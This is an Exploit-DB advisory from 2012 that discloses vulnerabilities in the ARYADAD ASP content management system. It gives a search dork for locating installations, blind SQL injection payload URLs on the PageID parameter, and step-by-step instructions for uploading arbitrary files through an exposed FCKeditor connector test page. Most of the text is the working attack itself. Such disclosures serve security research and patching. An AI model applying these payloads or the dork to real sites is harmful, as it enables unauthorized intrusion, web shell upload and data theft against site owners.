ARYADAD - Multiple Vulnerabilities

EDB-ID:

18405




Platform:

ASP

Date:

2012-01-21


# 
# Title     : ARYADAD Multi Vulnerability
# Author    : Red Security TEAM
# Date      : 21/01/2012
# Vendor    : http://cms.aryadad.com/
# Tested On : Windows Server 2008 (IIS 7.5)
# Dork      : Powered by ARYADAD Corporation
# Contact   : Info [ 4t ] RedSecurity [ d0t ] COM
# Home      : http://RedSecurity.COM
#
# Exploit   :
# 
# I         : Blind SQL Injection Vulnerability
# True      : http://server/Default.aspx?PageID=117' and 1-1 = '0
# False     : http://server/Default.aspx?PageID=117' and 2-1 = '0
#
# II        : File Upload Vulnerability
# 1. Go to  : /FA/fckeditor/editor/filemanager/connectors/test.html
# 2. Set Connector To ASP.Net and upload your file , You can see your uploaded files in FA/userfiles/file/
#